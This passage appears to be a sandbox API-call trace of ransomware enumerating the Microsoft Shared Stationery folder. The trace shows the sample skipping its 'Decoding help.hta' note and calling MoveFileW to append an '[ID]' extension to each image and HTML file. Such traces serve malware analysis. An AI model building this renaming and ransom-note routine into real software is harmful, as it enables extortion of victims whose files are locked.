Shared\\Stationery\\OrangeCircles.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0044.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0044.775] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce34510c, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce34510c, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce109c99, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0044.775] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0044.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0044.775] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Peacock.htm") returned -1 [0044.775] lstrlenW (lpString="Peacock.htm") returned 11 [0044.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0044.775] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0044.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Peacock.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" [0044.775] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" [0044.775] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0044.775] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0045.513] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa51b2c9, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0048.680] lstrcpyW (in: lpString1=0x5fbd100, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0048.680] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0048.680] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0048.680] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0048.680] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Peacock.jpg") returned -1 [0048.680] lstrlenW (lpString="Peacock.jpg") returned 11 [0048.680] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0048.680] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0048.680] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Peacock.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" [0048.680] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" [0048.681] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0048.681] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0049.894] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f0b40b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f0b40b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44b55629, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf8d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pine_Lumber.jpg", cAlternateFileName="")) returned 1 [0050.240] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.240] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.240] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0050.240] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0050.241] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Pine_Lumber.jpg") returned -1 [0050.241] lstrlenW (lpString="Pine_Lumber.jpg") returned 15 [0050.241] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.241] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.241] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Pine_Lumber.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" [0050.241] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" [0050.241] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0050.241] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.241] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f31568, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f31568, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pretty_Peacock.jpg", cAlternateFileName="")) returned 1 [0050.241] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.241] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.241] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0050.241] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0050.241] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Pretty_Peacock.jpg") returned -1 [0050.241] lstrlenW (lpString="Pretty_Peacock.jpg") returned 18 [0050.241] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.241] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.241] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Pretty_Peacock.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" [0050.241] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" [0050.241] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0050.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.242] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc4f7d822, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc4f7d822, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x44bc7a43, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36e1, dwReserved0=0x0, dwReserved1=0x0, cFileName="Psychedelic.jpg", cAlternateFileName="")) returned 1 [0050.242] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0050.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0050.242] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Psychedelic.jpg") returned -1 [0050.242] lstrlenW (lpString="Psychedelic.jpg") returned 15 [0050.242] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Psychedelic.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" [0050.242] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" [0050.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0050.242] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0050.242] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3913c6, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3913c6, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xce12fdf6, ftLastWriteTime.dwHighDateTime=0x1ca040d, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0050.242] lstrcpyW (in: lpString1=0x11027670, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.242] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.242] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0050.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0050.243] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Roses.htm") returned -1 [0050.243] lstrlenW (lpString="Roses.htm") returned 9 [0050.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0050.243] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0050.243] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Roses.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" [0050.243] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" [0050.243] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.[ID]g9uZrLhJaygpwRm1[ID]" [0050.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.203] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xce3b7523, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xce3b7523, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xaa567585, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0051.203] lstrcpyW (in: lpString1=0x11173bc8, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.203] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.203] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" [0051.203] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\decoding help.hta")) returned 0x1 [0051.203] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Roses.jpg") returned -1 [0051.203] lstrlenW (lpString="Roses.jpg") returned 9 [0051.203] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*" [0051.204] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\*.*") returned 65 [0051.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\", lpString2="Roses.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" [0051.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" [0051.204] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0051.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0051.682] FindNextFileW (in: hFindFile=0x5da7f8, lpFindFileData=0x18bdfd30 | out: lpFindFileData=0x18bdfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc53cdfab, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0xc53cdfab, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x45148cd9, 